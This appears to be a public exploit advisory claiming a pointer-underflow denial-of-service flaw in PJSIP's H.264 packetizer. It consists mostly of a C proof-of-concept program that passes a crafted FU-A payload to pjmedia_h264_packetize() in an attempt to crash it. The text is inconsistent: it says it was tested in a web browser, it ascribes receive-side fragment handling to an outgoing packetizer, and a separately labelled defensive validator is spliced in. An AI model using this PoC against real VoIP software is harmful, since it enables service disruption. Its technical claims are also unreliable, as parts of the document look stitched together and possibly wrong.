=============================================================================================================================================
| # Title : PJSIP PJMEDIA H.264 Improper FU-A State Validation in Packetizer May Lead to Pointer Underflow (DoS) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h |
=============================================================================================================================================
[+] Summary : A logical validation flaw was identified in the H.264 packetization routine within the PJMEDIA component of PJSIP.
Specifically, insufficient validation of FU-A (Fragmentation Unit – Type A) state handling in pjmedia_h264_packetize() may allow malformed RTP payloads to trigger unsafe pointer arithmetic.
When a crafted FU-A fragment is processed with the Start bit (S) unset and without a valid preceding fragmentation context, the packetizer may compute offsets relative to an assumed NAL start position.
In affected versions, improper boundary checks during this calculation can result in pointer underflow, causing out-of-bounds memory access.
Under typical modern memory protections (ASLR/DEP), successful exploitation is most likely limited to Denial of Service via application crash.
However, depending on heap layout and runtime conditions, unintended memory reads may occur.
[+] POC :
#include <pjlib.h>
#include <pjmedia.h>
#include <pjmedia-codec/h264_packetizer.h>   /* same path as the vendor header listed above */
#include <stdio.h>

#define MTU_SIZE     1400
#define PAYLOAD_SIZE 200

int main(void)
{
    pj_caching_pool cp;
    pj_pool_t *pool;
    pjmedia_h264_packetizer *pktz;
    pjmedia_h264_packetizer_cfg cfg;
    pj_status_t status;

    status = pj_init();
    if (status != PJ_SUCCESS) {
        printf("[-] pj_init() failed: %d\n", status);
        return 1;
    }
    pj_caching_pool_init(&cp, NULL, 1024*1024);
    pool = pj_pool_create(&cp.factory, "ExploitPool", 4096, 4096, NULL);

    /* Zero the config, then set the two fields that matter; non-interleaved
     * mode is the one that produces FU-A fragments. */
    pj_bzero(&cfg, sizeof(cfg));
    cfg.mtu  = MTU_SIZE;
    cfg.mode = PJMEDIA_H264_PACKETIZER_MODE_NON_INTERLEAVED;
    status = pjmedia_h264_packetizer_create(pool, &cfg, &pktz);
    if (status != PJ_SUCCESS) {
        printf("[-] pjmedia_h264_packetizer_create() failed: %d\n", status);
        return 1;
    }

    /* Byte 0: 0x7C = F=0, NRI=3, NAL type 28 (FU-A indicator).
     * Byte 1: 0x05 = S=0, E=0, R=0, original NAL type 5 (IDR slice).
     * The remaining bytes stay zero. */
    pj_uint8_t malformed_h264[PAYLOAD_SIZE];
    pj_bzero(malformed_h264, PAYLOAD_SIZE);
    malformed_h264[0] = 0x7C;
    malformed_h264[1] = 0x05;

    /* pjmedia_h264_packetize() emits one RTP payload per call and advances
     * *pos; a single call is what this test exercises. */
    unsigned pos = 0;
    const pj_uint8_t *out_pkt = NULL;
    pj_size_t out_pkt_len = 0;

    printf("[*] Starting Packetization - Target: Pointer Underflow\n");
    status = pjmedia_h264_packetize(pktz, malformed_h264, PAYLOAD_SIZE,
                                    &pos, &out_pkt, &out_pkt_len);
    printf("[*] status=%d pos=%u payload_len=%lu\n",
           status, pos, (unsigned long)out_pkt_len);
    printf("[+] Process finished. If no crash, the system might be protected.\n");

    pj_pool_release(pool);
    pj_caching_pool_destroy(&cp);
    pj_shutdown();
    return 0;
}
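The validation the summary describes as missing, shown as an added example that is not pjproject code: a receive-side FU-A state check that refuses a fragment whose S bit is clear while no fragmentation is in progress, so no offset is ever computed relative to an assumed NAL start. The type and function names, the error codes and the sample bytes are assumptions of this example.

```c
#include <stdint.h>
#include <stddef.h>

/* Per-stream FU-A (RFC 6184, NAL type 28) reassembly state. */
typedef struct {
    int     in_fragment;  /* 1 while a fragmented NAL is being reassembled */
    uint8_t nal_type;     /* NAL type carried by the fragment in progress */
} fua_state;

enum {
    FUA_OK           =  0,  /* accepted; *complete set when the NAL ended */
    FUA_ERR_SHORT    = -1,  /* fewer than indicator + FU header bytes */
    FUA_ERR_NOT_FUA  = -2,  /* indicator NAL type is not 28 */
    FUA_ERR_NO_START = -3,  /* S bit clear but no fragment in progress */
    FUA_ERR_TYPE     = -4   /* NAL type changed inside one fragment run */
};

/* Validate one FU-A payload before any offset arithmetic is done on it.
 * Only FUA_OK advances the state; FUA_ERR_TYPE also drops the context. */
int fua_validate(fua_state *st, const uint8_t *pl, size_t len, int *complete)
{
    if (len < 2) return FUA_ERR_SHORT;
    if ((pl[0] & 0x1F) != 28) return FUA_ERR_NOT_FUA;
    int s = (pl[1] >> 7) & 1;       /* Start bit */
    int e = (pl[1] >> 6) & 1;       /* End bit */
    uint8_t type = pl[1] & 0x1F;    /* original NAL unit type */

    if (s) {                        /* a start always opens a fresh context */
        st->in_fragment = 1;
        st->nal_type = type;
    } else if (!st->in_fragment) {  /* the case the summary describes */
        return FUA_ERR_NO_START;
    } else if (type != st->nal_type) {
        st->in_fragment = 0;
        return FUA_ERR_TYPE;
    }
    if (e) st->in_fragment = 0;     /* NAL complete, context closed */
    *complete = e;
    return FUA_OK;
}

/* Constructed input: the PoC's first two bytes (FU-A, S=0, E=0, IDR) arriving
 * on a stream with no fragment in progress. Returns the verdict. */
int lone_middle_fragment_verdict(void)
{
    fua_state st = {0, 0};
    const uint8_t pl[] = {0x7C, 0x05, 0x00, 0x00};
    int complete = 0;
    return fua_validate(&st, pl, sizeof pl, &complete);
}
```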
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================